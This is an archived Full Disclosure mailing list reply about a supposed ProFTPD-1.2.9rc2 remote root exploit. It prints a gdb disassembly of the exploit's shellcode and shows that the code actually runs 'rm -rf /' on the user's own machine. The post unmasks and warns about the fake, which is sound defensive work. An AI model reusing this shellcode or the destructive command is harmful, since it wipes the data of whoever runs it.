Full Disclosure mailing list archives
Re: ProFTPD-1.2.9rc2 remote root exploit
From: Simon Kirby <sim () netnation com>
Date: Fri, 24 Oct 2003 08:27:58 -0700
On Fri, Oct 24, 2003 at 03:36:17PM +0200, Andreas Gietl wrote:
On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote: this seems to delete sth on the local harddisk. anybody else seeing this effect?
(gdb) disassemble &sc Dump of assembler code for function sc: 0x0804a1a0 <sc+0>: xor %eax,%eax 0x0804a1a2 <sc+2>: push %eax 0x0804a1a3 <sc+3>: push $0x582f2066 0x0804a1a8 <sc+8>: push $0x722d206d 0x0804a1ad <sc+13>: push $0x7258632d 0x0804a1b2 <sc+18>: push $0x41414141 0x0804a1b7 <sc+23>: push $0x41414141 0x0804a1bc <sc+28>: push $0x41414141 0x0804a1c1 <sc+33>: push $0x41414141 0x0804a1c6 <sc+38>: push $0x4368732f 0x0804a1cb <sc+43>: push $0x6e69622f 0x0804a1d0 <sc+48>: xor %eax,%eax 0x0804a1d2 <sc+50>: mov %al,0x7(%esp,1) 0x0804a1d6 <sc+54>: mov %al,0x1a(%esp,1) 0x0804a1da <sc+58>: mov %al,0x23(%esp,1) 0x0804a1de <sc+62>: mov %esp,0x8(%esp,1) 0x0804a1e2 <sc+66>: xor %ebx,%ebx 0x0804a1e4 <sc+68>: lea 0x18(%esp,1),%ebx 0x0804a1e8 <sc+72>: mov %ebx,0xc(%esp,1) 0x0804a1ec <sc+76>: xor %ebx,%ebx 0x0804a1ee <sc+78>: lea 0x1b(%esp,1),%ebx 0x0804a1f2 <sc+82>: mov %ebx,0x10(%esp,1) 0x0804a1f6 <sc+86>: mov %eax,0x14(%esp,1) 0x0804a1fa <sc+90>: xor %ebx,%ebx 0x0804a1fc <sc+92>: mov %esp,%ebx 0x0804a1fe <sc+94>: lea 0x8(%esp,1),%ecx 0x0804a202 <sc+98>: xor %edx,%edx 0x0804a204 <sc+100>: lea 0x14(%esp,1),%edx 0x0804a208 <sc+104>: mov $0xb,%al 0x0804a20a <sc+106>: int $0x80 0x0804a20c <sc+108>: xor %ebx,%ebx 0x0804a20e <sc+110>: xor %eax,%eax 0x0804a210 <sc+112>: inc %eax 0x0804a211 <sc+113>: int $0x80 0x0804a213 <sc+115>: add %al,(%eax) End of assembler dump. Demangles "rm -rf /" and execs it? Simon- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Valdis . Kletnieks (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Robert Jaroszuk (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
- Re[2]: ProFTPD-1.2.9rc2 remote root exploit Wine (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Lorenzo Hernandez Garcia-Hierro (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Robert Jaroszuk (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Simon Kirby (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit qobaiashi (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit upb (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Jedi/Sector One (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete kang (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete dilema (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Cael Abal (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Rob Lewis (Oct 24)
- <Possible follow-ups>
- ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- RE: ProFTPD-1.2.9rc2 remote root exploit GARCIA Lionel (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Philipp Buehler (Oct 24)